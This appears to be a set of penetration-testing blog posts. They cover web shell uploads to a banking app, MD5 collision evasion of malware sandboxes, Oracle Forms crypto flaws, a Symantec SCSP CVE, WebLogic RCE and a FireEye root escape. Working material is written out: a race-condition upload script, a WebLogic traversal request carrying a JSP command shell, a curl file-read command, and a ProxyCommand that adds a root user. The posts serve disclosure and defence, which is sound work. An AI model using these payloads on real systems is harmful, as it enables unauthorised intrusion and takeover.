Finding the salt with SQL inception

Introduction

Web application penetration testing is a well-researched area with proven tools and methodologies. Still, new techniques and interesting scenarios come up all the time, creating new challenges even after a hundred projects.

In this case study we start with a relatively simple blind SQL injection situation and show how this issue could be exploited in a way that made remote code execution possible. The post will also serve as a reference for using Duncan, our simple framework created to facilitate blind exploitation.

Continue reading Finding the salt with SQL inception

Virtual Bank Robbery – In Real Life

Introduction

This week a Polish bank was breached through its online banking interface. According to the reports, the attacker stole 250,000 USD and is now using the personal information of 80,000 customers to blackmail the bank. Allegedly the attacker exploited a remote code execution vulnerability in the online banking application to achieve all this.

We at Silent Signal have performed penetration tests on numerous online banking applications, and we can say that while these systems are far from flawless, RCE vulnerabilities are fairly rare. Accordingly, the majority of in-the-wild incidents can be traced back to the client side, to compromised browsers or naive users.

But from time to time we find problems that could easily lead to incidents similar to the one at the aforementioned Polish bank. In this case study we describe a remote code execution vulnerability we discovered in an online banking application. The vulnerability is now fixed; the affected institution was not based in Poland (or in our home country, Hungary).

The bug

The online banking test account had access to an interface where users could upload various files (pictures, HTML files, Office documents, PDFs etc.). The upload interface checked only the MIME type of the uploaded documents (taken from the Content-Type header), but not the extension. The Content-Type header is user controlled, so uploading a public ASPX shell was an obvious way to go; but after the upload completed I got an error message saying that the uploaded file was not found, and the message revealed the full path of the missing file on the server's filesystem. I was a bit confused because I could not reproduce this error with any other file I tried to upload. I thought it was possible that an antivirus was in place that removed the malicious document before the application could handle it.
I uploaded a simple text file containing the EICAR antivirus test string with a .docx extension (so I could make sure that the extension wasn't the problem), and this verified the theory. The antivirus deleted the file before the application could parse it, which resulted in an error message revealing the full path:
[Screenshot: EICAR upload error revealing the full path]

This directory was reachable from the web, and the prefix of the file names was based on the current "tick count" of the system. The biggest problem was that the application removed the uploaded files after a short period of time, since this was only a temporary directory. I could also only leak the names of deleted files, not those that remained on the system longer. So exploitation required a bit more effort.

The Exploit

Before going into the details of the exploit, let’s see what “primitives” I had to work with:

  • I can upload a web shell (antivirus evasion is way too easy…)
  • I can leak the tick count by uploading an EICAR signature
  • I can access my web shell if I’m fast enough and know the tick count of the server at the moment the shell was uploaded

Unfortunately I can't do these three things at the same time, so this is a kind of race condition. According to the documentation "a single tick represents one hundred nanoseconds or one ten-millionth of a second", so guessing the tick count on a remote system over the Internet seems like a really tough job. Luckily, I don't always trust the documentation ;)

I built a simple test application that models the primitives described above and implemented a simple time synchronization algorithm that I had used before to predict time on remote servers with second precision. The algorithm basically works by making guesses and adjusting them based on the difference from the actual reported server times.
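
A minimal sketch of this guess-and-adjust idea (not the exact algorithm from the exploit; probe() stands in for whatever returns a server-reported timestamp):

import time

def estimate_clock_offset(probe, rounds=10):
    # probe() is assumed to return the timestamp the server reports for a request
    offset = 0.0
    for _ in range(rounds):
        sent = time.time()
        server_time = probe()
        received = time.time()
        # assume the server stamped the request roughly mid-flight...
        observed = server_time - (sent + (received - sent) / 2.0)
        # ...and nudge the running estimate towards the observed difference
        offset += (observed - offset) / 2.0
    return offset

# predicted server time at any moment: time.time() + estimate_clock_offset(probe)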

While this algorithm wasn’t effective on the 100ns scale, the results were really interesting! I could observe that:

  1. Parallel requests result in identical tick counts with high probability
  2. The lower bits of the tick counts tend to represent the same few values

The reason for this is probably that the server processes are not truly parallel (the OS scheduler just makes you believe they are) and that the resolution of the tick counter is imperfect. I also found out that, since the filenames depend only on the time my requests arrive at the application, the delays of the responses introduce avoidable uncertainty.

My final solution is based on grequests, an awesome asynchronous HTTP library for Python. This allows me to issue requests very fast without having to wait for the answers in between. I'm using two parallel threads. The first uploads a number of web shells as fast as it can, while the other issues a number of requests with the EICAR string and then tries to access the web shells at constant offsets from the retrieved tick counts. The following chart shows the average hit rates (%) as the server-side delay between the creation and deletion of the uploads changes:

[Chart: avg_tick_hits – average hit rates vs. server-side deletion delay]

And although a few percent doesn't seem high, don't forget that I only had to be lucky once! As you can see, there is a limit for exploitability (with this setup) between 300 ms and 400 ms, but as we later found out the uploads were transferred to a remote host, so the lifetime of the temporary files was above this limit, making the application exploitable.

The model application and the test exploit are available on GitHub.
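
For reference, here is a heavily stripped-down sketch of this approach built on grequests; the endpoint paths, upload field name, temporary file naming scheme, tick-leaking regex and offset list are all assumptions made for illustration – the real model application and exploit are in the GitHub repository:

import re
import grequests

UPLOAD  = "http://victim.example/upload"   # hypothetical upload endpoint
TEMP    = "http://victim.example/temp/"    # hypothetical temporary directory
EICAR   = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
SHELL   = open("shell.aspx", "rb").read()
OFFSETS = range(-200000, 200001, 50000)    # candidate tick offsets (assumption)

# Fire a burst of shell uploads and EICAR uploads without waiting for the answers.
uploads = [grequests.post(UPLOAD, files={"file": ("shell.aspx", SHELL, "image/png")})
           for _ in range(20)]
probes = [grequests.post(UPLOAD, files={"file": ("eicar.docx", EICAR)})
          for _ in range(5)]
responses = grequests.map(uploads + probes, size=25)

# Leak tick counts from the antivirus-triggered "file not found" error messages.
ticks = [int(m.group(1)) for r in responses if r is not None
         for m in [re.search(r"(\d{15,})", r.text)] if m]

# Try to hit an uploaded shell at constant offsets from the leaked tick counts.
guesses = [grequests.get("%s%d_shell.aspx" % (TEMP, t + off))
           for t in ticks for off in OFFSETS]
for resp in grequests.map(guesses, size=50):
    if resp is not None and resp.status_code == 200:
        print("shell found at", resp.url)
        break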

Conclusion

In this case study we demonstrated how a low-impact information leak and a (seemingly) low-exploitability file upload bug could be chained together into an attack that can result in significant financial and reputational loss.

For application developers we have the following advice:

  • If you're in doubt, use cryptographically secure random number generators (see the sketch after this list).
  • Never assume that your software will be deployed to an environment similar to your test machine. A conflicting component (like the antivirus in this case) can and will cause unexpected behavior.
  • File uploads are always fragile parts of web applications, OWASP has some good guidelines about securely handling them.
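
As a minimal illustration of the first point, unguessable temporary file names can be derived from a CSPRNG instead of the system tick count (a sketch, not the vendor's actual fix):

import secrets

def temp_upload_name(extension):
    # 128 bits of randomness make the name practically unguessable,
    # unlike a prefix derived from a timestamp or tick count
    return "%s.%s" % (secrets.token_hex(16), extension)

print(temp_upload_name("docx"))   # e.g. '3b9f...c2.docx'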

And for those who are responsible for online banks or similar systems here are some thought-provoking questions:

  • Do your development teams follow a security focused development methodology? Because a good methodology is the base of a quality product.
  • Do you perform regular, technical security tests on your financial applications? Because people make mistakes.
  • Do you fix the discovered vulnerabilities on your production systems in reasonable time? Because tests are worth nothing if it takes forever to fix the findings.
  • Do you have an incident response plan? Because despite all effort, incidents will eventually happen.
  • Would you notice an incident? Because IR doesn’t get started by itself.
  • Could you determine what the exploited vulnerabilities were and which users exploited (or tried to exploit) them? Because an incident is an opportunity to learn.

Poisonous MD5 – Wolves Among the Sheep

MD5 has been known to be broken for more than a decade now. Practical attacks have been shown since 2006, and public collision generator tools have also been available since that time. The dangers of the developed collision attacks were demonstrated by academia and white-hat hackers too, but in the case of the Flame malware we've also seen malicious parties exploiting the weaknesses in the wild.

And while most have already moved away from MD5, there is still a notable group that heavily uses this obsolete algorithm: security vendors. It seems that MD5 has become the de facto standard for fingerprinting malware samples, and the industry doesn't seem willing to move away from this practice. Our friend Zoltán Balázs collected a surprisingly long list of security vendors using MD5, including the biggest names of the field.

The list includes, for example, Kaspersky, the discoverer of Flame, who just recently reminded us that MD5 is dead but only a few weeks earlier released a report including MD5 fingerprints only – ironically, even the malware they analysed uses SHA-1 internally…

And in case you think that MD5 is "good enough" for malware identification, let's take another example. The following picture shows the management console of a FireEye MAS – take a good look at the MD5 hashes, the time delays and the status indicators:

[Screenshot: fireeye_duplicate – FireEye MAS console showing duplicate MD5 submissions]

Download sample files

As you can see, binaries submitted for analysis are identified by their MD5 sums and no sandboxed execution is recorded if there is a duplicate (thus the shorter time delay). This means that if I can create two files with the same MD5 sum – one that behaves in a malicious way while the other doesn’t – I can “poison” the database of the product so that it won’t even try to analyze the malicious sample!
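
The poisoning only requires two different binaries that share an MD5 digest; verifying that a generated pair would indeed be treated as duplicates is a one-liner per hash (the file names below are placeholders):

import hashlib

def digests(path):
    data = open(path, "rb").read()
    return hashlib.md5(data).hexdigest(), hashlib.sha256(data).hexdigest()

benign_md5, benign_sha256 = digests("sheep.exe")        # harmless sample
malicious_md5, malicious_sha256 = digests("wolf.exe")   # shellcode-executing sample

assert benign_md5 == malicious_md5         # identical MD5 -> treated as a duplicate
assert benign_sha256 != malicious_sha256   # yet the two files are different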

After reading Nat McHugh's post about creating colliding binaries, I decided to create a proof of concept for this "attack". Although Nat demonstrated the issue with ELF binaries, the concept is basically the same for the Windows (PE) binaries that security products mostly target. The original example works by diverting the program execution flow based on the comparison of two string constants. The collision is achieved by adjusting these constants so that they match in one case, but not in the other.

My goal was to create two binaries with the same MD5 hash: one that executes arbitrary shellcode (the wolf) and another that does something completely different (the sheep). My implementation is based on the earlier work of Peter Selinger (the PHP script by Nat turned out to be unreliable across platforms…), with some useful additions:

  • A general template for shellcode hiding and execution;
  • RC4 encryption of the shellcode so that the real payload only appears in the memory of the wolf but not on the disk or in the memory of the sheep;
  • Simplified toolchain for Windows, making use of Marc Stevens' fastcoll (Peter used a much slower attack; fastcoll reduces collision generation from hours to minutes).

The approach may work with traditional AV software too, as many of these also use fingerprinting (not necessarily MD5) to avoid wasting resources on scanning the same files over and over (although the RC4 encryption results in VT 0/57 anyway…). It would also be interesting to see if "threat intelligence" feeds or reputation databases can be poisoned this way.

The code is available on GitHub. Please use it to test the security solutions in your reach and persuade vendors to implement up-to-date algorithms before compiling their next marketing APT report!

For the affected vendors: Stop using MD5 now! Even if you need MD5 as a common denominator, include stronger hashes in your reports, and don’t rely solely on MD5 for fingerprinting!

Testing Oracle Forms

SANS Institute accepted my GWAPT Gold Paper about testing Oracle Forms applications; the paper is now published in the Reading Room.

Forms is a typical example of a proprietary technology that back in the day might have looked like a good idea from a business perspective, but years later causes serious headaches on both the operational and the security side:

  • Forms uses naively implemented crypto with an (effectively) 32-bit RC4 key (see the brute-force sketch after this list)
  • The key exchange is trivial to attack, allowing full key recovery
  • Bit-flipping is possible since no integrity checking is implemented
  • Database password set at server side is sent to all clients (you read that correctly)
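
To put the first two items in perspective: an effective 32-bit key space can simply be searched offline against a known plaintext. The sketch below only illustrates the size of the search space and is not the key recovery technique described in the paper:

def rc4(key, data):
    # straightforward RC4 key scheduling and keystream generation
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def brute_force_key(ciphertext, known_prefix):
    # 2**32 candidates: slow in pure Python, trivial with dedicated hardware,
    # which is exactly why a 32-bit effective key size is inadequate
    for candidate in range(2 ** 32):
        key = candidate.to_bytes(4, "big")
        if rc4(key, ciphertext).startswith(known_prefix):
            return key
    return None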

And in case you’re wondering: applications based on Oracle Forms are still in use, thanks to vendor lock-in…

The full Gold Paper can be downloaded from the website of SANS Institute:

Automated Security Testing of Oracle Forms Applications

The accompanying code is available on GitHub.

CVE-2014-3440 – Symantec Critical System Protection Remote Code Execution

Today we release the details of CVE-2014-3440, a remote code execution vulnerability in Symantec Critical System Protection. You can get the detailed advisory on the following link:

CVE-2014-3440 – Symantec Critical System Protection Remote Code Execution

We reported the vulnerability with the help of Beyond Security, and Symantec fixed it on 19 January 2015. Although we didn't manage to get a nice logo :) in this blog post we provide some additional information regarding the issue. This is another example of how, just like any other software, security products can introduce new security risks into their environment.

First of all, here’s a short video demonstrating our exploit in action:

The exploit consists of two parts: first we need to register ourselves as an Agent with the SCSP Server. In default installations Agents can be registered without any authentication or prior knowledge. Before the official Symantec advisory was available I asked some of my peers if this step could be hardened or mitigated somehow, but they couldn't present any method to do this. And even if Agent registration were somehow restricted, the attack could still be executed from a compromised host with an Agent installed.

During the registration we obtain a GUID that allows us to make use of the bulk log upload feature. This feature is affected by a path traversal issue that allows arbitrary file writes leading to RCE. The exploitation method is detailed in our advisory.

Regarding the official workarounds: I actually giggled when I read about placing the log directory on a different physical drive, but I quickly realized that this is not the first case where software exploitation is mitigated by hardware :) The workaround would definitely work, and you only need a different logical partition (not a full physical drive) so that the drive letters differ.

As for the Prevention policies, let's just say that I studied SCSP to measure the behavioral detection capabilities of different endpoint products, and I wasn't really impressed (by any of the tested products)…

Bonus

While studying SCSP I stumbled upon another interesting thing that I wouldn't consider a vulnerability, but rather a really strange design decision. In a nutshell, the SCSP management interface allows connecting to different servers, and the server list can be edited without authentication. This way an attacker can replace the address of a legitimate server with her own and wait for administrators to log in:

And if you are wondering what that binary thing at the end is, here are some clues:

public byte[] encipherPassword(byte pwd[])
{
    XOREncoding.encode(pwd);
    return pwd;
}
public static void encode(byte data[])
{
    for(int i = 0; i < data.length; i++) data[i] ^= 0x5a;
}
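
Since encipherPassword() is just a single-byte XOR with 0x5a, recovering a captured password is trivial, for example in Python:

def decode(blob):
    # XOR is its own inverse, so applying the same operation decodes the value
    return bytes(b ^ 0x5A for b in blob)

# usage: decode(captured_bytes)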

The story of a pentester recruitment

Intro

Last year we decided to expand our pentest team, and we figured that offering a hands-on challenge would be a good filter for potential candidates, since we've accumulated quite a bit of experience from organizing wargames and CTFs at various events. We provided an isolated network with three hosts, and anyone could apply by submitting a name, an email address and a CV – we sent VPN configuration packs to literally everyone who did so. These packs included the following message (the original was in Hungarian).

Your task is to perform a comprehensive (!) security assessment of the hosts within range 10.10.82.100-254.

Typical tasks of a professional penetration tester include

  • asking relevant clarifying questions about new projects,
  • writing the technical part of business proposals,
  • comprehensive penetration testing,
  • report writing and presentation.

That is why we decided to test the candidates' knowledge of the above subjects. The scope of the challenge consisted of three servers, report writing and a presentation to the technical staff, with a time limit of two weeks. Here is our solution:

Continue reading The story of a pentester recruitment

Code Review on the Cheap

At the 31st Chaos Communication Congress I had the pleasure of watching Fabian Yamaguchi's presentation about the code analysis platform Joern. I had heard about this tool before at Hacktivity, but this time I got a deeper view of the internals and capabilities of the software, which inspired me to clean up and release a piece of code I had been using for years in code review projects.

My idea was quite similar to that of Fabs: recognize potentially vulnerable code patterns and create a tool that is aware of the syntax in order to look for the anomalies in the source efficiently. Yes, I could use regular expressions and grep, but eventually I faced several problems like:

  • Ugly source code 
  • Keywords inside comments or strings
  • The complexity of the regex itself

Since I have to deal with several different languages, I also had to come up with a solution that is easily applicable to new grammars. In the end I settled on a solution somewhere between grep and Joern and implemented it in CROTCH (Code Review On The CHeap):

Instead of full-blown parsers, CROTCH only uses lexers, which are readily available in all flavors in the Pygments Python package (intended for source code highlighting), providing support for almost every language one can think of. Other lexers can also be created very easily – although installing them requires some setuptools-fu. With these lexers we can tokenize the source code, splitting it into meaningful parts and assigning types (like scalar, string, comment, keyword, etc.) to them. This is of course far from having an AST, for example, but it allows us to start creating small, targeted "mini-parsers" which focus only on the relevant parts of the source.

These "mini-parsers" can be implemented through a general purpose state machine, usually in a few dozen lines of Python. The example provided on GitHub implements a state machine similar to the following to identify simple format string bugs without bothering with most of the grammar:

[Diagram: printf format string state machine]
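
To give a flavour of such a mini-parser, here is a minimal sketch in the spirit of CROTCH (an illustration, not the actual implementation from the repository):

from pygments.lexers import get_lexer_by_name
from pygments.token import Name, Punctuation, String

SINKS = {"printf"}   # extend with further format-string sinks as needed

def find_format_string_candidates(source, language="c"):
    lexer = get_lexer_by_name(language)
    state = "IDLE"    # IDLE -> SINK -> ARGS
    findings = []
    for tokentype, value in lexer.get_tokens(source):
        if value.isspace():
            continue
        if state == "IDLE":
            if tokentype in Name and value in SINKS:
                state = "SINK"
        elif state == "SINK":
            state = "ARGS" if (tokentype in Punctuation and value == "(") else "IDLE"
        elif state == "ARGS":
            # a string literal as the first argument is fine; anything else
            # (e.g. a variable) deserves a closer look
            if tokentype not in String:
                findings.append(value)
            state = "IDLE"
    return findings

print(find_format_string_candidates('printf(user_input); printf("ok %d", x);'))
# ['user_input']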

We have successfully utilized this approach to find bugs at scale, from enterprise Java applications to large PL/SQL projects – we hope you'll find CROTCH useful too! As always, issues, feature requests and pull requests are welcome on our GitHub!

WebLogic undocumented hacking

During an external pentest – what a surprise – I found a WebLogic server with no interesting content. I searched for papers and tutorials about WebLogic hacking with little success; the public exploitation techniques resulted only in file reading. The OISSG tutorial shows only the following usable file-reading technique:

curl -s http://127.0.0.1/wl_management_internal2/wl_management \
  -H "username: weblogic" -H "password: weblogic" \
  -H "wl_request_type: file" -H "file_name: c:\boot.ini"

You can read WAR, CLASS, XML (config.xml) and LOG (logs\WeblogicServer.log) files through this vulnerability.
This is not enough, because I want to run operating system commands. The Hacking Exposed Web Applications, 3rd Edition book mentions an attack scenario against WebLogic, but this was also only a file read, although it was based on a great idea:
The web.xml of wl_management_internal2 defines two servlets, FileDistributionServlet and BootstrapServlet. I downloaded the weblogic.jar file using the file-read attack above and decompiled FileDistributionServlet.class:

total 128
drwxr-xr-x  2 root root  4096 2014-10-03 14:54 ./
drwxr-xr-x 24 root root  4096 2004-06-29 23:18 ../
-rw-r--r--  1 root root  7073 2004-06-29 23:17 BootstrapServlet$1.class
-rw-r--r--  1 root root  8876 2004-06-29 23:17 BootstrapServlet.class
-rw-r--r--  1 root root  1320 2004-06-29 23:17 BootstrapServlet$MyCallbackHandler.class
-rw-r--r--  1 root root  1033 2004-06-29 23:16 FileDistributionServlet$1.class
-rw-r--r--  1 root root  1544 2004-06-29 23:16 FileDistributionServlet$2.class
-rw-r--r--  1 root root   945 2004-06-29 23:16 FileDistributionServlet$3.class
-rw-r--r--  1 root root   956 2004-06-29 23:16 FileDistributionServlet$4.class
-rw-r--r--  1 root root   927 2004-06-29 23:16 FileDistributionServlet$5.class
-rw-r--r--  1 root root   950 2004-06-29 23:16 FileDistributionServlet$6.class
-rw-r--r--  1 root root 21833 2004-06-29 23:16 FileDistributionServlet.class
-rw-r--r--  1 root root   364 2004-06-29 23:16 FileDistributionServlet$FileNotFoundHandler.class
-rw-r--r--  1 root root 38254 2014-10-03 12:24 FileDistributionServlet.jad
-rw-r--r--  1 root root  1378 2004-06-29 23:16 FileDistributionServlet$MyCallbackHandler.class
root@s2crew:/

The FileDistributionServlet had the following interesting function:

 private void internalDoPost(HttpServletRequest httpservletrequest, HttpServletResponse httpservletresponse)
        throws ServletException, IOException
    {
        String s;
        String s1;
        InputStream inputstream;
        boolean flag;
        String s2;
        String s3;
        boolean flag1;
        s = httpservletrequest.getHeader("wl_request_type");
        httpservletresponse.addHeader("Version", String.valueOf(Admin.getInstance().getCurrentVersion()));
        s1 = httpservletrequest.getContentType();
        inputstream = null;
        Object obj = null;
        flag = true;
        s2 = null;
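        // "wl_upload_application_name" is read straight from a request header,
        // so its value is fully attacker-controlled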
        s3 = httpservletrequest.getHeader("wl_upload_application_name");
        flag1 = "false".equals(httpservletrequest.getHeader("archive"));
        Object obj1 = null;
        String s4 = null;
        if(s3 != null)
        {
            ApplicationMBean applicationmbean;
            try
            {
                MBeanHome mbeanhome = Admin.getInstance().getMBeanHome();
                applicationmbean = (ApplicationMBean)mbeanhome.getAdminMBean(s3, "Application");
            }
            catch(InstanceNotFoundException instancenotfoundexception)
            {
                applicationmbean = null;
            }
            if(applicationmbean != null)
            {
                File file = new File(applicationmbean.getFullPath());
                s4 = file.getParent();
            }
        }
        if(s4 == null)
        {
            s4 = Admin.getInstance().getLocalServer().getUploadDirectoryName() + File.separator;
            if(s3 != null)
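                // the attacker-controlled header value is concatenated into the
                // upload path without any sanitization -> directory traversal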
                s4 = s4.concat(s3 + File.separator);
        }
        Object obj2 = null;
        if(s1 != null && s1.startsWith("multipart") && s.equals("wl_upload_request"))
        {
            httpservletresponse.setContentType("text/plain");
            Object obj3 = null;
            try
            {
                MultipartRequest multipartrequest;
                if(httpservletrequest.getHeader("jspRefresh") != null && httpservletrequest.getHeader("jspRefresh").equals("true"))
                {
                    s2 = httpservletrequest.getHeader("adminAppPath");
                    multipartrequest = new MultipartRequest(httpservletrequest, s2, 0x7fffffff);
                } else
                {
                    multipartrequest = new MultipartRequest(httpservletrequest, s4, 0x7fffffff);
                }
                File file1 = multipartrequest.getFile((String)multipartrequest.getFileNames().nextElement());
                s2 = file1.getPath();
                flag = false;
                if(flag1)
                {
                    String s5 = s2.substring(0, s2.lastIndexOf("."));
                    extractArchive(s2, s5);
                    s2 = s5;
                }
----- CUT ------

After investigating the function, the key observation is that the wl_upload_application_name header is appended to the upload path without any sanitization, so a directory traversal sequence lets us choose where the file is written. Based on this, I constructed the following HTTP POST request:

POST /wl_management_internal2/wl_management HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:20.0) Gecko/20100101 Firefox/20.0
Connection: keep-alive
username: weblogic
password: weblogic
wl_request_type: wl_upload_request
wl_upload_application_name: ..\..\..\..\..\..\..\..\..\you_can_define_the_upload_directory
archive: true
Content-Length: XXXX
Content-Type: multipart/form-data; boundary=---------------------------55365303813990412251182616919
Content-Length: 959

-----------------------------55365303813990412251182616919
Content-Disposition: form-data; name="file"; filename="cmdjsp.jsp"
Content-Type: application/octet-stream

// note that linux = cmd and windows = "cmd.exe /c + cmd"
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
   String cmd = request.getParameter("cmd");
   String output = "";
   if(cmd != null) {
      String s = null;
      try {
         Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) {
            output += s;
         }
      }
      catch(IOException e) {
         e.printStackTrace();
      }
   }
%>
<%=output %>
<!--    http://michaeldaw.org   2006    -->
-----------------------------55365303813990412251182616919--

It's as simple as that. The only prerequisite of this exploit is the default weblogic/weblogic account.
This is what I call real hacking!

;)

How to get root access on FireEye OS

1. Background

A couple of months ago we had the opportunity to take a closer look at a FireEye AX 5400 malware analysis appliance. The systems of FireEye are famous for catching targeted attacks that tend to evade traditional security systems, so we were really excited to find out more about the capabilities of this system. However, we couldn't resist taking a look at the management interfaces of the appliance either; these turned out to be at least as exciting as our initial area of interest.

2. Technical part

2.1 Escaping the shell

The FireEye AX 5400 provides management interfaces over HTTPS and SSH. After login, the SSH interface provides a special restricted command shell (similar to the consoles of ordinary network equipment) that allows administrators to configure the device but prevents them from interacting with the underlying operating system. Aside from the special shell, the service was just an ordinary SSH server that allowed limited use of SCP.

The SCP process could only read and write the home directories and couldn't create directories. If the user initiated an SSH connection to a remote system, the $HOME/.ssh directory was created to store the known_hosts file. After this, one could upload an SSH public key to log into the system without a password, but the default shell of the account was still set to the original configuration shell with limited functionality.

How could we escape this shell completely and run arbitrary commands? The answer lies in the slogin command of the SSH console, which was actually an ordinary SSH client that behaved exactly as expected. This SSH client reads per-user configuration options from the $HOME/.ssh/config file, and the ProxyCommand option allows operating system command execution when the user initiates an SSH connection:

ProxyCommand - Specifies the command to use to connect to the server.
The command string extends to the end of the line, and is executed
with the user's shell.

To obtain access to an unrestricted command shell, a configuration file was created that added a new user to the shadow file of the system with the home directory of the root user (which contained the previously uploaded SSH public key), UID 0 and an unrestricted default shell. The configuration file contained commands similar to the following:

Adding a new root user
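
Reconstructed purely for illustration (the exact commands are the ones shown in the screenshot above; the host alias, shell path and shadow entry values below are placeholders), such a configuration entry could look roughly like this:

# $HOME/.ssh/config -- illustrative sketch, not the exact file used during the test
Host backdoor
    # ProxyCommand is executed on the appliance when the connection is initiated
    ProxyCommand echo 's2crew:x:0:0::/root:/bin/bash' >> /etc/passwd; echo 's2crew:<password-hash>:16000:0:99999:7:::' >> /etc/shadow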

The built-in "slogin" command could trigger this configuration:

Triggering the command execution

The new s2crew user now has an unlimited command shell and can log in with the previously uploaded public key:

Logging into the system

2.2 Afterlife

Having successfully demonstrated the issue, we contacted the vendor, who responded instantly, acknowledged the vulnerability and regularly notified us about the status of the fix. The official fix was released on 8 July 2014 for FEOS versions older than 7.1.0.

The exploitability of the issue was limited, since attackers would have to authenticate themselves on an administrative interface that should only be exposed to dedicated network segments. Still, this vulnerability gave us a unique insight into the inner workings of the product, which inspired us to continue researching the platform.